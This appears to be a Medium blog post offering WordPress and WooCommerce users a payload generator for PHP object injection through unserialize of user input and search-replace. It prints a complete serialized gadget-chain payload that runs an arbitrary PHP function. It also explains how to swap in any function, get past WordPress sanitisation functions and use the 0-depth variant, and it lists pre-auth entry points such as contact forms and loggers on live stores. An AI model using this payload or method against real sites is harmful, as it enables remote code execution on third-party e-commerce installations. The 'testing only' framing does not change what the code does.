slavco
slavco
Jan 12 · 3 min read
Yes, they care! For privacy too! A lot!

Lucky for me I had an opportunity to see how average WordPress users care about their installations security, how they ask a lot about it, how they take even extra measures than needed, how they learn/read about WP/web security a lot! Today I had an opportunity to exchange few words about WP with one… First standing position of view was, WP doesn’t care about developers, but puts its focus towards users. Second point of view was that WP users don’t care about security, they want to click and everything to work for them, which is half correct statement. For this reason, plus my past experience with average WordPress users, I decided to give average WordPress users manual/easy way how to test their installations for POI/unserialize of user input and all of this based on public not fixed / not properly fixed knowledge(until now this knowledge was understandable only for developers).

Used materials

WP setups covered by tests

Any WordPress with any WooCommerce version having:

  • (censored_data) plugins, causing direct unserialize of the user input, affecting ~50k+ live Woo stores
  • listed plugins here or wp_cli used for search-replace (any depth) over WP/Woo setup affecting many many setups…

Giving the WP users right tool

Many of the WP enthusiasts when they test POI/unserialize of the user input are failing to fully understand how to add payload mostly because null byte values. Sometimes they forgot to urlencode, sometimes payload gets cleaned by WordPress text sanitation functions like sanitize_text_field , wp_kses_post, … Also very often it is hard for them to craft the correct payload based on knowledge from public presentations (this isn’t case for developers and exploit writers). So, here it is a tool that will solve those problems for the WP users:

This tool you can use it from your console or via your host / localhost — just hit it, will give you simple instruction / click and will generate your payload. You can supply its input via: console, web or by hand in the script (last two could be used for supplying arrays as input towards test functions).

Test scenarios and payloads

I have generated the following payload:

O:19:"WC_Log_Handler_File":1:{S:10:"\00\2A\00\68\61\6E\64\6C\65\73";C:33:"Requests_Utility_FilteredIterator":140:{x:i:0;a:2:{i:0;s:10:"hit_search";i:1;a:2:{i:0;s:5:"test2";i:1;s:5:"test3";}};m:a:1:{S:11:"\00\2A\00\63\61\6C\6C\62\61\63\6B";s:7:"print_r";}}}

and was created with simple call towards

http://localhost/poc_woo.php?func=print_r&param[0]=hit_search&param[1][0]=test2&param[1][1]=test3
  • you can add any PHP/WP function to be executed with any input.
  • you can add as many you want hit_searchparams in order to hit the search-replace and one to be real input towards chosen function.

This payload could be used for testing following scenarios:

  • direct unserialize of user input
  • 1+ depth recursive search and replace

and will bypass the text sanitation functions. In case users want to supply payload for 0 depth search and replace then adding + after O: in the beginning of the payload will do the job!

Attack surface

  • preauth via contact forms, activity trackers / loggers, visitor purchase
  • authenticated users in the form of subscribers or contributors
  • search and replace could be abused in SaaS scenarios or via simple request towards web admin or better via guessing the search term (try with service url in http :) )
  • … e.g. use your imagination, ofc there are many more scenarios

Who to use

This tool is created for testing purposes only and it is strong enough to generate good PoC payloads which will cover almost all scenarios, but it is created to be not suitable for real exploitation, because if person who can generate effective silent PoC for search and replace + direct with it, already knows how to craft the payload.

Very smart phone

Promo

If you are wp developer or wp host provider or wp security product provider with valuable list of clients, we offer subscription list and we are exceptional (B2B only).

websec

Attack sources + web application security

slavco

Written by

slavco

websec

websec

Attack sources + web application security

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade